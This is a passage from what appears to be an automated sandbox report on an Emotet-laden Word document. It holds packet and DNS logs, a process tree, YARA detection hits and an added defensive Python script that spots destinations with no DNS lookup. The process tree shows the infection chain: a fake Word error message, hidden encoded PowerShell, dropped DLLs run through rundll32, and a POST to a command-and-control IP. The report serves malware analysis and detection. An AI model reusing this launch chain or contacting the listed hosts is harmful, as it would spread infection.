                                                                                                                              Feb 1, 2021 23:25:17.746190071 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746238947 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746248007 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746289015 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746337891 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746356010 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746387959 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746438026 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746486902 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746491909 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746539116 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746562958 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746591091 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746644974 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746651888 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746696949 CET4434974435.208.182.43192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 1, 2021 23:24:58.880695105 CET | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:24:58.928853989 CET | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:00.078610897 CET | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:00.135023117 CET | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:01.324814081 CET | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:01.372632980 CET | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:02.746282101 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:02.797038078 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:04.148582935 CET | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:04.200645924 CET | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:04.974355936 CET | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:05.045759916 CET | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:05.620496988 CET | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:05.689152002 CET | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:06.620959997 CET | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:06.678680897 CET | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:06.708297014 CET | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:06.756216049 CET | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:07.636528015 CET | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:07.694077969 CET | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:07.961083889 CET | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:08.008883953 CET | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:09.209168911 CET | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:09.259351015 CET | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:09.653359890 CET | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:09.714550018 CET | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:10.767510891 CET | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:10.823693037 CET | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:11.948971987 CET | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:12.007550001 CET | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:12.912555933 CET | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:12.960546017 CET | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:13.668315887 CET | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:13.724653006 CET | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:13.963905096 CET | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:14.015094995 CET | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:15.228617907 CET | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:15.279382944 CET | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:15.730209112 CET | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:15.794337988 CET | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:16.395081997 CET | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:16.455329895 CET | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:16.674420118 CET | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:16.839863062 CET | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:16.854863882 CET | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:16.910959005 CET | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:17.589114904 CET | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:17.639827013 CET | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:21.696125984 CET | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:21.755196095 CET | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:23.831988096 CET | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:23.880327940 CET | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:29.161744118 CET | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:29.224725962 CET | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:43.635374069 CET | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:43.695733070 CET | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:44.288331985 CET | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:44.344719887 CET | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:44.961225033 CET | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:45.010988951 CET | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:45.397160053 CET | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:45.469964027 CET | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:45.472508907 CET | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:45.556623936 CET | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:46.067111015 CET | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:46.123389006 CET | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:46.673748970 CET | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:46.730539083 CET | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:47.361151934 CET | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:47.420326948 CET | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:47.830176115 CET | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:47.878108978 CET | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:48.203210115 CET | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:48.259474993 CET | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:49.472291946 CET | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:49.531461000 CET | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:50.022305012 CET | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:50.074915886 CET | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:25:59.745949030 CET | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:25:59.794500113 CET | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:26:00.062516928 CET | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:26:00.121984959 CET | 53 | 52752 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:26:02.930495024 CET | 60542 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:26:02.991489887 CET | 53 | 60542 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:26:33.801259041 CET | 60689 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:26:33.850214958 CET | 53 | 60689 | 8.8.8.8 | 192.168.2.4
Feb 1, 2021 23:26:35.533540964 CET | 64206 | 53 | 192.168.2.4 | 8.8.8.8
Feb 1, 2021 23:26:35.589812994 CET | 53 | 64206 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 1, 2021 23:25:15.730209112 CET | 192.168.2.4 | 8.8.8.8 | 0xd28e | Standard query (0) | physio-svdh.ch | A (IP address) | IN (0x0001)
Feb 1, 2021 23:25:16.674420118 CET | 192.168.2.4 | 8.8.8.8 | 0x8fb2 | Standard query (0) | www.isatechnology.com | A (IP address) | IN (0x0001)
Feb 1, 2021 23:25:16.854863882 CET | 192.168.2.4 | 8.8.8.8 | 0xb149 | Standard query (0) | www.isatechnology.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 1, 2021 23:25:15.794337988 CET | 8.8.8.8 | 192.168.2.4 | 0xd28e | No error (0) | physio-svdh.ch | | 194.209.195.106 | A (IP address) | IN (0x0001)
Feb 1, 2021 23:25:16.839863062 CET | 8.8.8.8 | 192.168.2.4 | 0x8fb2 | No error (0) | www.isatechnology.com | isatechnology.com | | CNAME (Canonical name) | IN (0x0001)
Feb 1, 2021 23:25:16.839863062 CET | 8.8.8.8 | 192.168.2.4 | 0x8fb2 | No error (0) | isatechnology.com | | 35.208.182.43 | A (IP address) | IN (0x0001)
Feb 1, 2021 23:25:16.910959005 CET | 8.8.8.8 | 192.168.2.4 | 0xb149 | No error (0) | www.isatechnology.com | isatechnology.com | | CNAME (Canonical name) | IN (0x0001)
Feb 1, 2021 23:25:16.910959005 CET | 8.8.8.8 | 192.168.2.4 | 0xb149 | No error (0) | isatechnology.com | | 35.208.182.43 | A (IP address) | IN (0x0001)
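The DNS tables above list resolutions for only two names, while the 443 session in the HTTP Packets table goes to 173.249.20.233, an address that appears in no listed answer. Joining answers to outbound flows by transaction ID is the quickest way to surface such hard-coded destinations. The block below is an added example and is not part of the Joe Sandbox report or its tooling; its input data are constructed from the DNS Queries, DNS Answers, TCP Packets and HTTP Packets tables above (first client packet of each flow), and the function names are my own.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed from the DNS Queries / DNS Answers tables above. The transaction
# ID ties each answer row back to the name the host actually asked for, so the
# A record returned under the CNAME target (isatechnology.com) is credited to
# the original query (www.isatechnology.com).
DNS_QUERIES: Dict[int, str] = {
    0xd28e: "physio-svdh.ch",
    0x8fb2: "www.isatechnology.com",
    0xb149: "www.isatechnology.com",
}
DNS_ANSWERS: List[Tuple[int, str, str, str]] = [  # (txid, owner, type, rdata)
    (0xd28e, "physio-svdh.ch", "A", "194.209.195.106"),
    (0x8fb2, "www.isatechnology.com", "CNAME", "isatechnology.com"),
    (0x8fb2, "isatechnology.com", "A", "35.208.182.43"),
    (0xb149, "www.isatechnology.com", "CNAME", "isatechnology.com"),
    (0xb149, "isatechnology.com", "A", "35.208.182.43"),
]

# Constructed from the first client packet of each outbound TCP flow in the
# TCP Packets table plus the rundll32.exe session in the HTTP Packets table.
TCP_FLOWS: List[Tuple[str, int, str, int]] = [  # (src, sport, dst, dport)
    ("192.168.2.4", 49742, "194.209.195.106", 443),
    ("192.168.2.4", 49744, "35.208.182.43", 443),
    ("192.168.2.4", 49775, "173.249.20.233", 443),
]


def addresses_by_query(queries, answers):
    """Map every A-record address to the sorted list of query names that produced it."""
    out = defaultdict(set)
    for txid, _owner, rtype, rdata in answers:
        if rtype == "A" and txid in queries:
            out[rdata].add(queries[txid])
    return {ip: sorted(names) for ip, names in out.items()}


def label_flows(flows, queries, answers):
    """Attach the resolving query name(s) to each flow. An empty list means the
    destination was contacted without any DNS lookup visible in the capture."""
    names = addresses_by_query(queries, answers)
    return [
        {"dst": dst, "dport": dport, "resolved_from": names.get(dst, [])}
        for _src, _sport, dst, dport in flows
    ]


def unresolved_destinations(flows, queries, answers):
    """Destinations with no preceding resolution, i.e. addresses the sample carried."""
    return sorted({f["dst"] for f in label_flows(flows, queries, answers)
                   if not f["resolved_from"]})


if __name__ == "__main__":
    for row in label_flows(TCP_FLOWS, DNS_QUERIES, DNS_ANSWERS):
        print(row)
    print("no DNS resolution:", unresolved_destinations(TCP_FLOWS, DNS_QUERIES, DNS_ANSWERS))
```

Two caveats when reading the result. The UDP table shows far more exchanges with 8.8.8.8:53 than the three queries listed, so the check only proves "no listed answer", not "no lookup"; and outside a sandbox a resolver cache, a lookup before capture started, or DNS over HTTPS will make a named destination look hard-coded. Treat an unresolved destination as a pivot for the analyst, not as a verdict.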

HTTP Request Dependency Graph

• 173.249.20.233
  • 173.249.20.233:443

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49775 | 173.249.20.233 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
Feb 1, 2021 23:26:34.798719883 CET | 5316 | OUT | POST /hzctvbal94fl2bqa/ HTTP/1.1
DNT: 0
Referer: 173.249.20.233/hzctvbal94fl2bqa/
Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQ
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 173.249.20.233:443
Content-Length: 8516
Connection: Keep-Alive
Cache-Control: no-cache
Feb 1, 2021 23:26:35.634749889 CET | 5329 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 01 Feb 2021 22:26:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


                                                                                                                              HTTPS Packets

Timestamp:Feb 1, 2021 23:25:15.906698942 CET
Source IP:194.209.195.106
Source Port:443
Dest IP:192.168.2.4
Dest Port:49742
Subject:CN=physio-svdh.ch
Issuer:CN=R3, O=Let's Encrypt, C=US
Not Before:Sat Jan 02 17:26:00 CET 2021
Not After:Fri Apr 02 18:26:00 CEST 2021
Chain Subject:CN=R3, O=Let's Encrypt, C=US
Chain Issuer:CN=DST Root CA X3, O=Digital Signature Trust Co.
Chain Not Before:Wed Oct 07 21:21:40 CEST 2020
Chain Not After:Wed Sep 29 21:21:40 CEST 2021
JA3 SSL Client Fingerprint:771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest:3b5074b1b5d032e5620f69f9f700ff0e

Timestamp:Feb 1, 2021 23:25:17.220958948 CET
Source IP:35.208.182.43
Source Port:443
Dest IP:192.168.2.4
Dest Port:49744
Subject:CN=isatechnology.com
Issuer:CN=R3, O=Let's Encrypt, C=US
Not Before:Fri Jan 15 19:51:39 CET 2021
Not After:Thu Apr 15 20:51:39 CEST 2021
Chain Subject:CN=R3, O=Let's Encrypt, C=US
Chain Issuer:CN=DST Root CA X3, O=Digital Signature Trust Co.
Chain Not Before:Wed Oct 07 21:21:40 CEST 2020
Chain Not After:Wed Sep 29 21:21:40 CEST 2021
JA3 SSL Client Fingerprint:771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest:3b5074b1b5d032e5620f69f9f700ff0e

                                                                                                                              Code Manipulations

                                                                                                                              Statistics

                                                                                                                              Behavior


                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Start time:23:25:04
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                              Imagebase:0x1d0000
                                                                                                                              File size:1937688 bytes
                                                                                                                              MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:08
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
                                                                                                                              Imagebase:0x7ff622070000
                                                                                                                              File size:273920 bytes
                                                                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:09
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff724c50000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:09
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\msg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:msg user /v Word experienced an error trying to open the file.
                                                                                                                              Imagebase:0x7ff79a800000
                                                                                                                              File size:26112 bytes
                                                                                                                              MD5 hash:EEB395D8DD3C1D6593903BD640687948
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:23:25:10
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:POwersheLL -w hidden -ENCOD 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
                                                                                                                              Imagebase:0x7ff7bedd0000
                                                                                                                              File size:447488 bytes
                                                                                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Yara matches:
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.698145971.0000027114D5D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.697286565.0000027114829000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.689101356.00000271130F0000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.700460639.000002712B620000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:18
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                                                                                                                              Imagebase:0x7ff760c70000
                                                                                                                              File size:69632 bytes
                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:19
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                                                                                                                              Imagebase:0x1340000
                                                                                                                              File size:61952 bytes
                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:22
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL
                                                                                                                              Imagebase:0x1340000
                                                                                                                              File size:61952 bytes
                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:24
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:34
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:23:25:42
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Disassembly

                                                                                                                              Code Analysis
